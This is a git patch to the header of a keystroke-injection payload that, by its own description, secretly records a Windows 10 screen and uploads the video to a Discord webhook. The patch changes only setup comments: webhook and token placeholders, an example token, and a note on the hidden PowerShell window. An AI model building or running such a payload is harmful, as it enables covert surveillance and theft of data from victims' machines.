From 7e749947062bd4e23482da36fae402fd7151c6cc Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 19 Jun 2025 16:54:10 +0000 Subject: [PATCH] Update Record-Screen-to-Discord.txt --- Record-Screen-to-Discord/Record-Screen-to-Discord.txt | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/Record-Screen-to-Discord/Record-Screen-to-Discord.txt b/Record-Screen-to-Discord/Record-Screen-to-Discord.txt index 037e567..d4ebd12 100644 --- a/Record-Screen-to-Discord/Record-Screen-to-Discord.txt +++ b/Record-Screen-to-Discord/Record-Screen-to-Discord.txt @@ -3,10 +3,9 @@ REM Author: @beigeworm REM Description: This script records the screen for a specified time to a mkv file, then sends the file to a discord webhook. REM Target: Windows 10 -REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL - -REM some setup for dukie script -DEFAULT_DELAY 100 +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook Channel and Token ONLY +REM eg. $dc='1206563651960586035/sNqypsq629XmXpc9TP924Dxeox6qMHDCI5e27qJ3fw4ef34wff4wf_df3aFOY' .... REM open powershell (remove "-W H" to show the window) DELAY 1000